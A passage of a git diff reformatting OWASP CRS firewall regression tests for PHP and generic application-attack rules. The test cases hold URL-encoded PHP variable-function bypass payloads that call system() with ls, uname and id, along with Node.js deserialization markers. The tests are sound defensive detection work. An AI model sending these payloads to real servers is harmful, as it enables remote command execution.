text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5bsystem%5d%5b0%5d%28ls%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 14 desc: PHP Variable Function bypass "[ system ] [ 0 ] ( ls )" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 15 desc: PHP Variable Function bypass "(['system'])[0]('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 16 desc: PHP Variable Function bypass "( [ system ][ 0 ]) {/* comment */0} ( ls )" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 17 desc: Check FP if Cookie contains '/' (slash) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Cookie: "x=(foo)/(bar)" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "933210" - - test_title: 933210-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "x=(foo)/(bar)" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933210] + - test_id: 18 desc: Check FP if Cookie contains '/' (slash) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Cookie: "x=(/foo)/(/bar)" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "933210" - - test_title: 933210-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "x=(/foo)/(/bar)" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933210] + - test_id: 19 desc: Check FP if text contains quotes and round parenthesis stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?search=this+is+a+%22dog%22+%28not+a+cat%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933210" - - test_title: 933210-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?search=this+is+a+%22dog%22+%28not+a+cat%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933210] + - test_id: 20 desc: Block function call via string stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?code=%22system%22%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?code=%22system%22%28ls%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 21 desc: Block function call via string using hex escape sequence stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml index 837538cfd..5c7d7b8a4 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml @@ -2,344 +2,343 @@ meta: author: "karelorigin, azurit" description: Test for "933211" PHP Variable Function bypass - enabled: true - name: 933211.yaml +rule_id: 933211 tests: - - test_title: 933211-1 + - test_id: 1 desc: Check for false positive 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29." - version: "HTTP/1.1" - output: - no_log_contains: id "933211" - - test_title: 933211-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29." + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933211] + - test_id: 2 desc: Check for false positive 2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d" - version: "HTTP/1.1" - output: - no_log_contains: id "933211" - - test_title: 933211-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933211] + - test_id: 3 desc: PHP Variable Function bypass "(system)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28system%29%28%27uname%27%29%20%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28system%29%28%27uname%27%29%20%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 4 desc: PHP Variable Function bypass "(sy.(st).em)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28sy.%28st%29.em%29%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28sy.%28st%29.em%29%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 5 desc: PHP Variable Function bypass "(string)'system'('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28string%29%22system%22%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28string%29%22system%22%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 6 desc: PHP Variable Function bypass "( string ) 'sys'.'t'.'em' ('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 7 desc: PHP Variable Function bypass "(string) {[system][0]} ('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 8 desc: PHP Variable Function bypass "define('x', 'sys' . 'tem');(x)/* comment */('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 9 desc: PHP Variable Function bypass "$y = 'sys'.'tem';($y)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 10 desc: PHP Variable Function bypass "define('z', [['sys' .'tem']]);(z)[0][0]('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 11 desc: PHP Variable Function bypass "(system)(ls)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28system%29%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28system%29%28ls%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 12 desc: PHP Variable Function bypass "(/* comment */system)(ls/* comment */)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 13 desc: PHP Variable Function bypass "[system][0](ls)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5bsystem%5d%5b0%5d%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5bsystem%5d%5b0%5d%28ls%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 14 desc: PHP Variable Function bypass "[ system ] [ 0 ] ( ls )" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 15 desc: PHP Variable Function bypass "(['system'])[0]('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 16 desc: PHP Variable Function bypass "( [ system ][ 0 ]) {/* comment */0} ( ls )" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 17 desc: Check FP if Cookie contains '/' (slash) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Cookie: "x=(foo)/(bar)" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "933211" - - test_title: 933211-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "x=(foo)/(bar)" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933211] + - test_id: 18 desc: Check FP if Cookie contains '/' (slash) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Cookie: "x=(/foo)/(/bar)" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "933211" - - test_title: 933211-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "x=(/foo)/(/bar)" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933211] + - test_id: 19 desc: Block function call via string stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?code=%22system%22%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?code=%22system%22%28ls%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 20 desc: Block function call via string using hex escape sequence stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 21 desc: Block function call bypass '(sy.(st).em)(@id)' (without trailing semi-colon) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?code=(sy.(st).em)(%40id)" - version: "HTTP/1.1" - output: - log_contains: id "933211" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?code=(sy.(st).em)(%40id)" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml index a38f9a38b..4dfd1dc63 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml @@ -1,419 +1,416 @@ --- meta: author: "lifeforms, airween, Max Leske, azurit" - enabled: true - name: "934100.yaml" - description: "Tests for rule 934100" +rule_id: 934100 tests: - - test_title: 934100-1 + - test_id: 1 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=_%24%24ND_FUNC%24%24_" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=_%24%24ND_FUNC%24%24_" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 2 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=__js_function" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=__js_function" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 3 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=eval%28String.fromCharCode" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=eval%28String.fromCharCode" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 4 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=function%28%29+%7B" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 